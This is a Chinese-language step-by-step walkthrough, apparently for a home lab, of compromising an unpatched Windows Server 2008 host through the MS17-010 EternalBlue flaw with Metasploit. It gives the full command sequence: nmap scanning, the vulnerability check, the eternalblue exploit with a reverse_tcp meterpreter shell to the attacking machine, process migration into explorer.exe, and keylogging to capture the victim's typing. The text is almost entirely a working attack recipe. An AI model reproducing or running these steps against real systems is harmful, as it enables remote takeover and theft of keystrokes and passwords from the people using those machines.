环境: 攻击机:192.168.200.101 //kali Linux 2020
靶机:192.168.200.103 (未打MS17-010补丁windowsServices2008.x64)
1:msfconsole //进入metaploit
2:nmap -sV 192.168.200.103(检查445端口是否开放) //使用nmap探测主机信息
3:利用msf的auxiliary模块进行漏洞验证
search ms17-010 //查询MS17-010永恒之蓝漏洞信息
use auxiliary/scanner/smb/smb_ms17_010 //使用辅助扫描smb,是否存在永恒之蓝漏洞
set rhost 192.168.200.103 //设置目标IP
set rport 445 //设置目标端口
run //开始扫描
4:设置攻击目标、端口、本机
use exploit/windows/smb/ms17_010_eternalblue //利用永恒之蓝漏洞
set rhost 192.168.200.103 //设置目标IP
set rport 445 //设置目标端口
set lhost 192.168.200.101 //设置kali linux IP地址
set payload windows/x64/meterpreter/reverse_tcp //使用reverse_tcp攻击荷载
show options //查看是否设置完成
run //开始攻击
若成功则拿到目标机的shell
6:输入ps查看进程
#找到explorer.exe进程(记住PID)
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
1996 1980 explorer.exe x86 0 VIOLET\violetevergarden C:\WINDOWS\Explorer.EXE
7:meterpreter > migrate 1996 //迁移会话
8:run post/windows/capture/keylog_recorder //进行键盘记录
#键盘记录完成后会生成一个文件,文件路径会在攻击完成后显示,注意,键盘记录需要按ctel+c结束。
————有些小伙伴可能在拿到shell后可能会有乱码这里给予解决方法:输入命令:chcp 65001 即可